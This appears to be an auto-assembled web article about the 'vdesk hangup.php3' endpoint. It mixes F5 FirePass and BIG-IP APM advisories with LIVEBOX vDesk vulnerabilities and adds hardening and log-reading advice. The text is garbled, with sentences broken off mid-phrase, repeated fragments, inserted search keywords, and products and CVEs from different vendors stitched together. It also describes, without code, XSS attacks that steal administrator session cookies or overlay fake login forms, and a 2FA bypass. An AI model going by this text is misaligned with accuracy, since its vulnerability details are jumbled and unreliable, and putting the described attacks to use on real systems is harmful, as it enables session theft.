Phone
Between 2022 and 2024, security researchers—including Massimiliano Ferraresi, Andrea Carlo Maria Dattola, Luca Borzacchiello, and Massimiliano Brolli from the TIM Red Team—discovered and disclosed a series of vulnerabilities in LIVEBOX Collaboration vDesk versions through v018 and v031.
If maintaining proprietary or heavily modified code, audit the hangup.php3 file. Replace dangerous functions with secure alternatives, implement strict type-casting (e.g., ensuring session_id is strictly an integer), and utilize parameterized inputs.
The most severe risk was . By injecting JavaScript that steals the victim's session cookie (via document.cookie ), the attacker could capture the authenticated session of a FirePass administrator. Using this cookie, they could masquerade as the administrator without needing the password or bypassing multi-factor authentication.
Lock down access to the VDesk administrative directories. Ensure they are only accessible via trusted internal IP addresses or a secure Virtual Private Network (VPN). vdesk hangupphp3 exploit
: Attackers gain a foothold on the server, allowing them to pivot deeper into the internal corporate network.
By injecting a fake login form overlaying the legitimate one, the attacker could as they typed them, thinking they were logging into the VPN.
Seeing this URI in your logs usually just means a user logged out or a scanner hit your gateway. Session Management: The most severe risk was
This subtle difference highlights the complexities of cross-browser vulnerability testing. The exploit was confirmed working on , Internet Explorer 6.0.2900.2180 , and Internet Explorer 7.0.5730.11 .
: Subscribe to F5's security notification service and apply patches for CVEs affecting your BIG-IP version, including CVE-2025-53521 disclosed in March 2026.
(e.g., v6.0.2) had Cross-Site Scripting (XSS) vulnerabilities in related paths like /vdesk/admincon/webyfiers.php CVE-2008-2637 Modern Open Redirects: Lock down access to the VDesk administrative directories
If you are seeing high volumes of traffic hitting this endpoint, it may indicate automated scanners testing for misconfigured host headers or expired sessions. Recommendations include:
(CVSS 9.8): For SAML users, the system fails to properly verify TOTP correctness before accepting a backup code. An attacker can bypass 2FA entirely by passing any arbitrary string as the backup code.
: If a client sends an HTTP request with a Host header that does not match the APM Virtual Server's configuration, the system redirects them here as a security measure to prevent unauthorized access.